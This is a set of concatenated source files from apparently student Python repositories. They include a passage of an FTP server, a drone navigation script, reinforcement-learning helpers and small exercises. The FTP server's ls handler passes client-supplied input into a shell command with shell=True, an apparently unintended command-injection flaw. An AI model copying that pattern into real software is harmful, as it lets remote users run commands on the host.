self.request.sendall(bytes(json.dumps(server_respone),encoding='utf8')) #成功退出,发送bye给客户端\n return True\n else:\n # task_data = json.loads(client_respone.decode())\n task_action = client_respone_str.get('action')\n if hasattr(self,task_action): #反射\n func = getattr(self,task_action)\n func(client_respone_str)\n # print(task_action,task_data)\n else:\n self.request.sendall(bytes('?Invalid command.-- %s'%client_respone.decode(),encoding='utf-8'))\n\n def put(self,*args,**kwargs):\n '''\n 上传文件到FTP服务器\n :return:\n '''\n filename = args[0].get('filename') #获取用户传过来的文件名\n filesize = args[0].get('file_size') #获取文件大小\n\n filepath = settings.USER_STATUS[self.user].get('currdir') #获取用户的当前路径\n\n userdb = json.load(open(settings.USERDB,'r')) #加载用户配置文件\n quota = settings.USER_STATUS[self.user].get('quota') #加载用户限额\n recv_size = 0 #初始一个用户接受到的大小为0\n\n try:\n if filesize + userdb[self.user].get('used') >= quota: #如果用户上传的文件加上现有使用空间大小大于用户配额的话\n server_respone = {\"status\":551,\"message\":\"The use dirsk space quota overrun.\"} #发送给用户551代码\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8')) #发送服务器响应\n raise Exception('overrun quota') #超出磁盘配额,主动触发异常\n\n if os.path.exists(os.path.join(filepath,filename)): #如果服务器上存在目标文件,先判断是否接受完成\n if os.stat(os.path.join(filepath,filename)).st_size == filesize: #文件已经存在,并且接受完成\n server_respone = {\"status\":200,\"message\":\"Could not create file. 
remote file already exists.\"} #告诉客户端文件已存在,并且接受完成, 发送200代码\n else: #如果大小不等, 发送给用户,询问是否断点续传\n have_size = os.stat(os.path.join(filepath,filename)).st_size #已接受的文件大小\n server_respone = {\"status\":210,\"have_size\":have_size} #发送给客户端未接受完成(210)和 已接受到的大小\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8')) #发送服务器响应给客户端\n\n client_respone_bytes = self.request.recv(1024) #接受用户的回应\n client_respone_str = json.loads(client_respone_bytes.decode() )\n\n if client_respone_str.get('status') == 211: #如果用户确认续传, 211\n server_respone = {\"status\":212,\"message\":\"Ok to send data.\"} #回送给用户一个确认值(ok)\n recv_size = have_size #重置变量recv_size为已经接收到的大小\n f = open(os.path.join(filepath,filename),'ab') #打开文件以追加形式打开\n elif client_respone_str.get('status') == 410: #如果客户端拒绝续传 410, 主动触发异常,并退出\n raise Exception('用户放弃操作')\n else:\n server_respone = {\"status\":150,\"message\":\"Ok to send data.\"}\n f = open(os.path.join(filepath,filename),'wb') #如果文件不存在,且配额满足需求,直接打开文件\n\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8')) #发送服务器响应\n\n while recv_size < filesize:\n data = self.request.recv(2048)\n f.write(data)\n recv_size += len(data)\n f.close()\n server_recv_success_bytes = self.request.recv(1024) #接受用户传来的客户端文件校验值, 和发送文件文件代码\n server_recv_success_str = json.loads(server_recv_success_bytes.decode())\n\n md5_value = md5sum(os.path.join(filepath,filename)) #在服务器端也做校验\n\n if server_recv_success_str.get('md5sum') == md5_value and server_recv_success_str.get('status') == 225: #比对成功\n server_recv_success_confir = {\"status\":226} #226, 接受完成\n self.request.sendall(bytes(json.dumps(server_recv_success_confir),encoding='utf-8'))\n\n userdb[self.user]['used'] += recv_size #将用户已经使用的空间容量+=接受到的文件大小\n json.dump(userdb,open(settings.USERDB,'w')) #持久化到文件\n log.logger.info('226, %s upload %s success '%(self.user,filename))\n\n else:\n server_recv_success_confir = {\"status\":550,\"message\":\"File to accept successful but failed an integrity check\"}\n self.request.sendall(bytes(json.dumps(server_recv_success_confir),encoding='utf-8'))\n log.logger.info('%s upload %s failure, File to accept successful but failed an integrity check'%(self.user,filename))\n except Exception as e:\n return False\n\n def ls(self,*args,**kwargs):\n '''\n 列出目录下的文件和文件夹\n :param args:\n :param kwargs:\n :return:\n '''\n flag = args[0].get('dirname')\n cmd = args[0].get('action')\n if not flag: #如果用户没有输入列出的指定目录,\n # print('+'*30)\n Dirname = settings.USER_STATUS[self.user].get('currdir') #Dirname 为当前目录\n abs_path = Dirname #用户目录的绝对路径\n else:\n Dirname = flag #如果用户输入了,那么拼接一下\n abs_path = os.path.join(settings.USER_STATUS[self.user].get('currdir'),Dirname)\n\n if abs_path.count('..'):\n if os.path.abspath(abs_path).startswith(settings.USER_STATUS[self.user].get('homedir')):\n if os.path.exists(abs_path):\n command = subprocess.Popen('%s -lh %s'%(cmd,abs_path),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n command_out = command.stdout.read() #获取标准输出\n command_err = command.stderr.read() #获取错误输出\n\n if not command_err:\n send_data = command_out\n else:\n send_data = command_err\n\n server_respone = {\"size\":len(send_data),\"status\":150,\"message\":\"Here comes the directory listing.\"} #150 Here comes the directory listing.\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8')) #发送给用户\n\n client_response_bytes = self.request.recv(1024) #接受用户端发送的确认码, 150+1\n client_response_str = json.loads(client_response_bytes.decode())\n\n if client_response_str.get(\"status\") == 151: #获取用户准备接受标志位\n 
self.request.sendall(send_data) #发送命令执行结果给用户\n server_send_success = {\"status\":226,\"message\":\"226 Directory send OK.\"} #发送完成确认给客户\n self.request.sendall(bytes(json.dumps(server_send_success),encoding='utf-8'))\n else:\n server_respone = {\"status\":250,\"message\":\"Not Found files or directory!\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8')) #不存在\n else:\n data = {\"status\":403}\n self.request.sendall(bytes(json.dumps(data),encoding='utf-8')) #访问拒绝!\n\n elif abs_path.startswith(settings.USER_STATUS[self.user].get('homedir')):\n if os.path.exists(abs_path):\n command = subprocess.Popen('%s -lh %s'%(cmd,abs_path),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n command_out = command.stdout.read() #获取标准输出\n command_err = command.stderr.read() #获取错误输出\n if command_out:\n send_data = command_out\n else:\n send_data = command_err\n\n server_respone = {\"size\":len(send_data),\"status\":150,\"message\":\"Here comes the directory listing.\"} #150 Here comes the directory listing.\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8')) #发送给用户\n\n client_respone_bytes = self.request.recv(1024)\n client_response_str = json.loads(client_respone_bytes.decode())\n\n if client_response_str.get(\"status\") == 151: #获取用户准备接受标志位\n self.request.sendall(send_data) #发送命令执行结果给用户\n server_send_success = {\"status\":226,\"message\":\"226 Directory send OK.\"} #发送完成确认给客户\n self.request.sendall(bytes(json.dumps(server_send_success),encoding='utf-8'))\n else:\n server_respone = {\"status\":250,\"message\":\"Not Found files or directory!\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8')) #不存在\n else:\n data = {\"status\":403}\n self.request.sendall(bytes(json.dumps(data),encoding='utf-8')) #访问拒绝!\n\n def delete(self,*args,**kwargs):\n '''\n 删除目录下的文件和文件夹\n :param args:\n :param kwargs:\n :return:\n '''\n Dirname = args[0].get('dirname') #取出文件名\n abs_path = os.path.join(settings.USER_STATUS[self.user].get('currdir'),Dirname) #拼接一下\n\n userdb = json.load(open(settings.USERDB,'r')) #加载用户配置文件\n filesize = 0 #取出要删除文件的大小, 初始化一个值,然后在下面根据判断来更改\n\n if abs_path.count('..') or abs_path.startswith(settings.USER_STATUS[self.user].get('homedir')):\n if os.path.abspath(abs_path).startswith(settings.USER_STATUS[self.user].get('homedir')):\n if os.path.isdir(abs_path): #用户输入的是一个目录\n filesize = os.stat(abs_path).st_size\n try:\n os.rmdir(abs_path)\n server_respone = {\"status\":250,\"message\":\"Delete operation successful.\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8'))\n userdb[self.user]['used'] -= filesize #减少大小\n json.dump(userdb,open(settings.USERDB,'w')) #持久化到文件\n log.logger.info('250 %s del %s success, IP/Port: %s'%(self.user,Dirname,self.client_address))\n except OSError:\n server_respone = {\"status\":550,\"message\":\"Directory not empty: '%s'\"%Dirname}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8'))\n return False\n elif os.path.isfile(abs_path): #文件的操作\n filesize = os.stat(abs_path).st_size\n os.remove(abs_path)\n server_respone = {\"status\":250,\"message\":\"Delete operation successful.\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8'))\n userdb[self.user]['used'] -= filesize\n json.dump(userdb,open(settings.USERDB,'w'))\n log.logger.info('250 %s del %s success, IP/Port: %s'%(self.user,Dirname,self.client_address))\n else:\n data = {\"status\":404,\"message\":\"Delete operation failed, Not found file or directory!\"}\n 
self.request.sendall(bytes(json.dumps(data),encoding='utf-8')) #不存在\n log.logger.info('404 %s del %s falure, not fount file, IP/Port: %s'%(self.user,Dirname,self.client_address))\n else:\n server_respone = {\"status\":403,\"message\":\"Forbidden!\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8')) #访问拒绝!\n log.logger.info('403 %s del %s operation not permitted! IP/Port: %s'%(self.user,Dirname,self.client_address))\n else:\n server_respone = {\"status\":403,\"message\":\"Forbidden!\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8')) #访问拒绝!\n log.logger.info('403 %s del %s operation not permiitted, IP/port: %s'%(self.user,Dirname,self.client_address))\n\n def mkdir(self,*args,**kwargs):\n '''\n 创建文件夹\n :param args:\n :param kwargs:\n :return:\n '''\n Dirname = args[0].get('dirname') #取出文件名\n abs_path = os.path.join(settings.USER_STATUS[self.user].get('currdir'),Dirname) #拼接一下\n\n userdb = json.load(open(settings.USERDB,'r')) #打开用户自己的配置文件\n\n if not abs_path.startswith(settings.USER_STATUS[self.user].get('homedir')):\n server_respone = {\"status\":403,\"message\":\"Forbidden: Operation not permitted!\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8')) #访问拒绝!\n log.logger.info('%s create %s operation not permitted, IP/Port: %s'%(self.user,Dirname,self.client_address))\n else:\n if os.path.abspath(abs_path).startswith(settings.USER_STATUS[self.user].get('homedir')):\n if not os.path.exists(abs_path):\n os.makedirs(abs_path)\n filesize = os.stat(abs_path).st_size\n server_respone = {\"status\":257,\"message\":\"'%s' created\"%Dirname}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8'))\n\n userdb[self.user]['used'] += filesize #用户使用大小+=文件夹大小, PS: 文件夹也占用空间的\n json.dump(userdb,open(settings.USERDB,'w'))\n\n log.logger.info('%s create dir %s successfully, IP/Port: %s'%(self.user,Dirname,self.client_address))\n else:\n server_respone = {\"status\":550,\"message\":\"Create directory operation failed, Target forlder already exists.\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8')) #不存在\n log.logger.info('%s create dir %s failure, Target forlder already exists Tar, IP/Port: %s'%(self.user,Dirname,self.client_address))\n else:\n server_respone = {\"status\":403,\"message\":\"Forbidden: Operation not permitted!\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8')) #访问拒绝!\n log.logger.info('%s created %s failure, Operation not permiited! 
IP/Port: %s'%(self.user,Dirname,self.client_address))\n\n def get(self,*args,**kwargs):\n '''\n 下载文件到本地\n :return:\n '''\n abs_filepath = args[0].get('filename') #获取用户要下载的文件名和绝对路径\n count_num = abs_filepath.count(os.sep) #根据系统平台统计是否还有相对路径,并用os.sep替换\n if count_num == 0: #如果用户输入的是一个\n filename = abs_filepath\n filepath = settings.USER_STATUS[self.user].get('currdir') #当前工作路径\n else:\n par_path = abs_filepath.split(os.sep)[:-1] #取出用户传入的目录的开头路径,取出来是个列表\n par_path_join = \"%s\"%os.sep.join(par_path) #在拼接一下成字符串\n filename = abs_filepath.split(os.sep)[-1] #取出文件名,需要发送给客户端\n filepath = os.path.join(settings.USER_STATUS[self.user].get('currdir'),par_path_join)\n try:\n if os.path.isfile(os.path.join(filepath,filename)):\n file_size = os.stat(os.path.join(filepath,filename)).st_size #发送单位为字节\n\n server_respone = {\"status\":150,\"filesize\":file_size,\"filename\":filename,\n \"message\":\"Opening BINARY mode data connection for %s (%s bytes)\"%(filename,file_size)}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8')) #发送给用户一个找到文件的信息 包括: 文件大小和文件名给客户端\n\n response = self.request.recv(1024)\n client_respone = json.loads(response.decode())\n\n if client_respone.get('status') == 400: #客户端文件已存在\n return False\n elif client_respone['status'] == 401: #用户放弃续传\n return False\n elif client_respone['status'] == 210: #断点续传\n have_size = client_respone['have_size'] #获取已接受到的大小\n send_size = have_size\n elif client_respone['status'] == 200: #本地没有要下载的文件\n send_size = 0\n\n print('Transfer: ',filename)\n f = open(os.path.join(filepath,filename),'rb')\n f.seek(send_size) #改变文件指针从用户接受��的大小开始\n for line in f: #循环\n self.request.sendall(line) #发送\n send_size += len(line)\n\n print()\n f.close()\n #md5校验\n md5_value = md5sum(os.path.join(filepath,filename)) #服务器端计算出来一个md5值\n server_send_success = {\"status\":226,\"md5sum\":md5_value,\"message\":\"Transfer complete.\"} #发送给客户端响应代码和md5校验值\n self.request.sendall(bytes(json.dumps(server_send_success),encoding='utf-8'))\n\n client_recv_respone = self.request.recv(1024) #收取用户接受的情况\n client_recv_respone_str = json.loads(client_recv_respone.decode())\n if client_recv_respone_str.get('status') == 227:\n log.logger.info('226 %s download %s success'%(self.user,filename)) #记录日志\n else:\n log.logger.info('550 %s download %s failure'%(self.user,filename)) #记录日志\n\n elif os.path.isdir(os.path.join(filepath,filename)): #如果用户下载的是个目录的话\n server_respone = {\"status\":551,\"filename\":filename,\"message\":\"Can not download directory\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8'))\n else:\n server_respone = {\"status\":404,\"filename\":filename,\"message\":\"Not found remote file or directory!\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8'))\n except Exception as e:\n return False\n\n def login(self,*args,**kwargs):\n '''\n 用户登录方法\n :param user: 接受用户输入账号\n :param pwd: 接受用户传入密码\n :return: return 0: 表示认证成功, 1: 表示账户或者密码错误, 2, 表示用于已经登录,不能重复登录!\n '''\n flag = False\n while not flag:\n recv_user_info = self.request.recv(1024) #接受用户传入的账号密码\n if len(recv_user_info) == 0:break #如果为空,跳出循环\n user,pwd = recv_user_info.decode().split() #取出用户名和密码\n\n\n userdb = json.load(open(settings.USERDB,'r'))\n if user in userdb.keys():\n if user == userdb[user].get('username') and MD5(pwd) == userdb[user].get('password'):\n msg_data = {\"status\":230,\"message\":\"230 Login successful.\\nRemote system type is %s.\\nUsing binary mode to transfer files.\"%sys.platform.upper()}\n 
self.request.sendall(bytes(json.dumps(msg_data),encoding='utf-8'))\n if not os.path.isdir(os.path.join(settings.HOMEDIR,user)):\n os.mkdir(os.path.join(settings.HOMEDIR,user))\n if GetConfig(user,'quota'):\n defa_quota = GetConfig(user,'quota') #如果用户设置了单独的配额,使用用户配额, 并转换为字节\n quota = float(defa_quota)*1024*1024\n else:\n defa_quota = GetConfig('default','quota') #如果没设置单独的使用默认的,即400M, 并转换为字节\n quota = float(defa_quota)*1024*1024\n userdb = json.load(open(settings.USERDB,'r'))\n used = userdb[user].get('used')\n settings.USER_STATUS[user] = {'ip_port':self.client_address,\n 'username':user,\n 'homedir':os.path.join(settings.HOMEDIR,user),\n 'currdir':os.path.join(settings.HOMEDIR,user),\n 'quota':quota,\n 'used':used}\n self.user = user\n log.logger.info('230 %s login FTP server successfully, IP/Port: %s'%(user,self.client_address))\n flag = True #登录成功后退出循环\n else:\n msg_data = {\"status\":530,\"message\":\"530 Login incorrect.\\nftp: Login failed\"}\n self.request.sendall(bytes(json.dumps(msg_data),encoding='utf-8'))\n log.logger.info('530 %s log FTP server falure, username or passsword is incorrect'%user)\n else:\n msg_data = {\"status\":530,\"message\":\"530 Login incorrect.\\nftp: Login failed\"}\n self.request.sendall(bytes(json.dumps(msg_data),encoding='utf-8'))\n log.logger.info('530 %s log FTP server falure, username or passsword is incorrect'%user)\n\n def rename(self,*args,**kwargs):\n ''' 重命名文件/文件夹\n :param args:\n :param kwargs:\n :return:\n '''\n filename = args[0].get('filename') #获取用户要下载的文件名和��对路径\n newfilename = args[0].get('newname') #获取更改后的名字\n abs_filepath = os.path.join(settings.USER_STATUS[self.user].get('currdir'),filename)\n newfile_abs_filepath = os.path.join(settings.USER_STATUS[self.user].get('currdir'),newfilename)\n count_num = abs_filepath.count(os.sep) #根据系统平台统计是否还有相对路径,并用os.sep替换\n if os.path.exists(abs_filepath):\n if not os.path.exists(newfile_abs_filepath): #确认更改后的文件不存在\n server_respone = {\"status\":350,\"message\":\"Ready for RNTO.\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8'))\n client_respone_bytes = self.request.recv(1024)\n client_respone_str = json.loads(client_respone_bytes.decode())\n if client_respone_str.get('status') == 351:\n os.rename(abs_filepath,newfile_abs_filepath)\n rename_res = {\"status\":250,\"message\":\"Rename successful.\"}\n self.request.sendall(bytes(json.dumps(rename_res),encoding='utf-8'))\n log.logger.info('250 %s rename success, newname is %s'%(filename,newfilename))\n else:\n server_respone = {\"status\":401,\"message\":\"Target file already exists.\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8'))\n log.logger.info('401 %s rename failure, target file %s is already exists '%(filename,newfilename))\n else: #源文件不在\n server_respone = {\"status\":404,\"message\":\"Not Fount source file.\"}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8'))\n log.logger.info('404 %s rename failure, Not found source file'%filename)\n\n def logout(self,user):\n '''\n 注销用户方法\n :param user:\n :return:\n '''\n del settings.USER_STATUS[user] #删除用户全局变量中的值\n log.logger.info('220 %s logout FTP server'%user)\n return True\n\n def cd(self,*args,**kwargs):\n '''\n 服务器目录切换方法\n :param args:\n :param kwargs:\n :return:\n '''\n flag = args[0].get('dirname') #获取要改变的目录\n Dirname = flag if args[0].get('dirname') else settings.USER_STATUS[self.user].get('currdir') #用户列出的目录的相对路径\n abs_path = os.path.join(settings.USER_STATUS[self.user].get('currdir'),Dirname) #用户目录的绝对路径\n\n if 
abs_path.startswith(settings.USER_STATUS[self.user].get('homedir')):\n #如果切换的目录是以homedir开头,证明是用户家目录下的文件\n if os.path.isdir(abs_path):\n # os.chdir(abs_path) #切换目录\n settings.USER_STATUS[self.user]['currdir'] = os.path.abspath(abs_path) #改变当前目录变量\n msg_data = {\"status\":250,\"message\":\"250 Directory successfully changed.\"}\n self.request.sendall(bytes(json.dumps(msg_data),encoding='utf-8'))\n else:\n msg_data = {\"status\":550,\"message\":\"550 Failed to change directory.\"}\n self.request.sendall(bytes(json.dumps(msg_data),encoding='utf-8'))\n else:\n msg_data = {\"status\":403,\"message\":\"403 Forbidden to change directory.\"}\n self.request.sendall(bytes(json.dumps(msg_data),encoding='utf-8'))\n\n def pwd(self,*args,**kwargs):\n '''\n 打印当前所在目录\n :param args:\n :param kwargs:\n :return:\n '''\n pwd = settings.USER_STATUS[self.user].get('currdir')\n self.request.sendall(bytes(pwd,encoding='utf-8'))\n\n def system(self,*args,**kwargs):\n '''\n 列出当前系统平台\n :param args:\n :param kwargs:\n :return:\n '''\n Platfrom = sys.platform #获取当前系统平台\n server_respone = {\"status\":215,\"message\":\"Type: %s\"%Platfrom.upper()}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8'))\n\n def status(self,*args,**kwargs):\n '''\n 显示现有用户相关信息\n :param args:\n :param kwargs:\n :return:\n '''\n userdb = json.load(open(settings.USERDB,'r')) #打开用户自己的配置文件\n msg_data = '''\nConnected and logged into: %s\nUser Home: %s\nUser quota: %s MB\nUsed size: %.2f MB\nServer version: %s\n '''%(self.user,\n settings.USER_STATUS[self.user].get('homedir'),\n settings.USER_STATUS[self.user].get('quota')/1024/1024,\n userdb[self.user].get('used')/1024/1024,\n settings.VERSION,)\n self.request.sendall(bytes(msg_data,encoding='utf-8'))\n","repo_name":"daniel-vv/stu177101","sub_path":"day10/FTPServer/lib/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":30629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"32558624045","text":"import time\n\nfrom typing import Optional, Dict\n\n# from examples.RightWallPID import RightWallPID\nfrom PID import RightWallPID\nfrom simple_airsim.api import coordinate_system\nfrom simple_airsim.api.drone import Drone\nfrom simple_airsim.api.gui_manager import GUIManager\nfrom simple_airsim.api.manager import Manager\nfrom matplotlib import pyplot as plt\nimport examples.sim_data\n\nsim_time = 0\nemergency_threshold = 0.7\nfront_threshold = 3.0\nright_far_threshold = 0.3\ntunnel_threshold = 0.2\nHEIGHT_Z_AXIS = -2.045\nPRECISION = 0.0001\n\nFLIGHT_TIME_MIN = 8\nFLIGHT_SPEED = 0.35\n\ndrone_points = []\ngraph = []\n\n\ndef stick_to_right_wall(drone: Drone):\n right_wall_pid = RightWallPID(target=right_far_threshold)\n\n while True:\n lidars = drone.get_lidars()\n position = drone.get_position()\n orientation = drone.get_orientation()\n velocity = drone.get_velocity()\n\n right = lidars['right']\n\n roll_rate = right_wall_pid.compute(right)\n drone.command(roll=roll_rate, pitch=0, yaw_rate=0, z=HEIGHT_Z_AXIS, wait=False)\n\n if abs(right - right_far_threshold) < PRECISION:\n print(f\"Distance from right: {right}\\nFinished stick_to_right()\")\n break # Drone can return to main-loop\n\n\ndef tunnel():\n pass\n\ndef emergency():\n print(\"Emergency mode!\")\n pass\n\n\ndef return_home():\n print(\"Returning home\")\n pass\n\ndef fly_forward(drone: Drone):\n\n print(\"Flying forward\")\n\n\n\ndef nav_algo(drone: Drone):\n global drone_points, sim_time, graph\n # Drone's State Machine:\n # 1. 
Emergency\n # 2. Fix right wall\n # 3. Scan surroundings\n # 4. Move to target point\n # 5. Return home\n battery_low = False\n\n # Takeoff\n drone.command(0, 0, 0, HEIGHT_Z_AXIS, True)\n # Add starting point to the graph:\n graph.append((drone.get_position()['x'],\n drone.get_position()['y'],\n drone.get_position()['z']))\n print(f'Home point: {graph[0]}')\n i = 0\n time_last = 0\n start_time = time.time()\n time_sec_last = 0\n while True:\n lidars = drone.get_lidars()\n position = drone.get_position()\n orientation = drone.get_orientation()\n velocity = drone.get_velocity()\n\n sim_time = time_last - start_time\n time_sec = int(sim_time)\n if time_sec > time_sec_last:\n if i % 1000 == 0:\n print(\"Time now: \", float('%.1f' % sim_time))\n if time_sec >= 60 * FLIGHT_TIME_MIN/2:\n battery_low = True\n time_sec_last = time_sec\n\n if i == 1000000:\n i = 0\n\n front = lidars['front']\n right = lidars['right']\n left = lidars['left']\n down = lidars['down']\n x = position['x']\n y = position['y']\n z = position['z']\n\n if front < emergency_threshold:\n emergency()\n\n elif left < tunnel_threshold and right < tunnel_threshold:\n tunnel()\n\n elif right > right_far_threshold:\n stick_to_right_wall(drone) # Loop\n\n elif battery_low:\n return_home()\n # Handle emergency actions:\n else:\n fly_forward(drone)\n\n i += 1\n time_last = time.time()\n\n\nif __name__ == '__main__':\n with Manager(coordinate_system.AIRSIM, method=nav_algo) as man:\n with GUIManager(man, 10, 10, 10, 3) as gui:\n gui.start()\n","repo_name":"ItaySharabi/LearnPython","sub_path":"Mine/NavAlgo.py","file_name":"NavAlgo.py","file_ext":"py","file_size_in_byte":3386,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"15017419043","text":"def day(month):\n a=[\"January\",\"March\",\"May\",\"July\",\"August\",\"October\",\"December\"]\n b=[\"April\",\"June\",\"September\",\"November\"]\n if month in a:\n return \"31 days\"\n elif month in b:\n return \"30 days\"\n else:\n return \"28/29 days\"\nprint(\"List of month: \",\"January,\",\"Februray,\",\"March,\",\"April,\",\"May,\",\"June,\",\"July,\",\"August,\",\"September,\",\"October,\",\"November,\",\"December\")\nprint(\"Enter the month: \")\na=input()\nprint(\"Number of days: \",day(a))","repo_name":"aa2301/test","sub_path":"month to days.py","file_name":"month to days.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"13495438618","text":"import gym\nimport numpy as np\n\n\ndef get_cumulative_rewards(rewards, gamma=0.99, dones=None):\n \"\"\"\n take a list of immediate rewards r(s,a) for the whole session\n compute cumulative returns (a.k.a. 
G(s,a) in Sutton '16)\n G_t = r_t + gamma*r_{t+1} + gamma^2*r_{t+2} + ...\n \"\"\"\n rewards = np.asarray(rewards)\n if dones is None:\n dones = np.zeros(rewards.shape[-1])\n dones = np.asarray(dones)\n\n batch_size = rewards.shape[0] if len(rewards.shape) > 1 else 1\n cumulative_rewards = []\n current_reward = np.zeros(batch_size)\n for r, done in zip(rewards.T[::-1], dones.T[::-1]):\n # do not discount if it is the last observation in a session\n current_reward = r + gamma * current_reward * (1 - done)\n cumulative_rewards.append(current_reward)\n\n return np.stack(cumulative_rewards[::-1], axis=1).reshape(rewards.shape)\n\n\ndef get_total_rewards(rewards, dones):\n \"\"\"\n Calculate total reward for all sessions in a batch\n \"\"\"\n rewards = np.asarray(rewards)\n dones = np.array(dones)\n dones = dones.reshape((-1, dones.shape[-1]))\n dones[:, -1] = False\n\n total_rewards = []\n current_total_reward = 0\n for reward, done in zip(rewards.flat, dones.flat):\n current_total_reward += reward\n if done:\n total_rewards.append(current_total_reward)\n current_total_reward = 0\n return total_rewards\n\n\ndef generate_session(agent, env, max_num_steps=1000):\n \"\"\"\n play a full session with provided agent and returns sequences of states, actions and rewards\n \"\"\"\n # arrays to record session\n states, actions, rewards = [], [], []\n s = env.reset()\n for t in range(max_num_steps):\n # action probabilities array aka pi(a|s)\n a = agent.get_action(s)\n new_s, r, done, info = env.step(a)\n\n # record session history to train later\n states.append(s)\n actions.append(a)\n rewards.append(r)\n\n s = new_s\n if done:\n break\n\n return states, actions, rewards\n\n\ndef generate_session_batch(agent, envs, num_steps=32):\n \"\"\"\n Play session in multiple environments and generate a batch of (states, actions, rewards, dones)\n \"\"\"\n # arrays to record session\n states, actions, rewards, dones = [], [], [], []\n s = envs.reset()\n for t in range(num_steps):\n # action probabilities array aka pi(a|s)\n a = agent.get_action(s)\n new_s, r, done, info = envs.step(a)\n\n # record session history to train later\n states.append(s)\n actions.append(a)\n rewards.append(r)\n dones.append(done)\n\n s = new_s\n\n states = np.asarray(states, dtype=np.float32).swapaxes(0, 1)\n actions = np.asarray(actions, dtype=np.int32).swapaxes(0, 1)\n rewards = np.asarray(rewards, dtype=np.float32).swapaxes(0, 1)\n dones = np.asarray(dones, dtype=bool).swapaxes(0, 1)\n\n last_value = agent.get_value(s)\n\n return states, actions, rewards, dones, last_value\n\n\ndef make_fun(agent, env, record_video=False, render=True, n_episodes=1):\n if record_video:\n env = gym.wrappers.Monitor(env, directory='videos', force=True)\n\n for episode in range(n_episodes):\n state = env.reset()\n done = False\n total_reward = 0\n while not np.asarray(done).all():\n if render:\n env.render()\n action = agent.get_action(state)\n new_s, reward, done, _ = env.step(action)\n total_reward += reward\n state = new_s\n print(\"Episode %d total reward: %f\" % (episode, total_reward))\n env.close()\n","repo_name":"vadimadr/reinforcement_learning","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74902030943","text":"class Option:\n def __init__(self, name, cwd, args, env):\n self.edit = False\n self.options = {\n \"name\": name,\n \"cwd\": cwd,\n \"args\": args,\n \"env\": env,\n }\n 
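# --- Aside (illustrative sanity check, not part of the source files): the
# --- get_cumulative_rewards() function above implements the backward recursion
# --- G_t = r_t + gamma * G_{t+1}; on a hand-computed trajectory it should give:
import numpy as np

rewards = np.array([[1.0, 1.0, 1.0]])                 # one session, three steps
# by hand: G_2 = 1.0, G_1 = 1 + 0.5*1.0 = 1.5, G_0 = 1 + 0.5*1.5 = 1.75
expected = np.array([[1.75, 1.5, 1.0]])
assert np.allclose(get_cumulative_rewards(rewards, gamma=0.5), expected)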
self.options.update(env)\n self.max = len(self.options.keys())\n","repo_name":"rFurgan/Gigachad","sub_path":"Option.py","file_name":"Option.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21320210091","text":"a = \"BBQWORLD\"\nb = \"KFCAPPLE\"\nc = \"LOT\"\nl1 = [a, b, c]\nn = input()\n\ncnt = 0\nfor i in range(3):\n for j in range(len(l1[i])):\n if l1[i][j] == n:\n cnt += 1\n\nprint(cnt)","repo_name":"giokim12/Algorithm","sub_path":"mincoding/15/min_15_9.py","file_name":"min_15_9.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"33445920546","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\n__author__=\"Limin Liu\"\n\n'''\nUsing pillow library to filter image and resize image\n'''\n\nfrom PIL import Image,ImageFilter\n\nim=Image.open('test.jpg') # open image\n\n\nim2=im.filter(ImageFilter.BLUR) # filter image\nim2.save('blur.jpg','jpeg')\n\n\nw,h=im.size\nprint('Original image size: %sx%s' %(w,h))\nim.thumbnail((w//2,h//2)) #resize image as half of source image\nprint('Resize image to: %sx%s' %(w//2,h//2))\nim.save('thumbnail.jpg','jpeg')","repo_name":"liulimin90/Python_Practice","sub_path":"Pillow_test.py","file_name":"Pillow_test.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"11814930997","text":"import enum\nimport math\nimport random\nimport uuid\nfrom enum import Enum\n\nimport mesa\nimport numpy as np\nfrom collections import defaultdict\n\nimport mesa.space\nfrom mesa import Agent, Model\nfrom mesa.datacollection import DataCollector\nfrom mesa.time import RandomActivation\nfrom mesa.visualization.ModularVisualization import VisualizationElement, ModularServer\nfrom mesa.visualization.modules import ChartModule\n\nMAX_ITERATION = 100\nPROBA_CHGT_ANGLE = 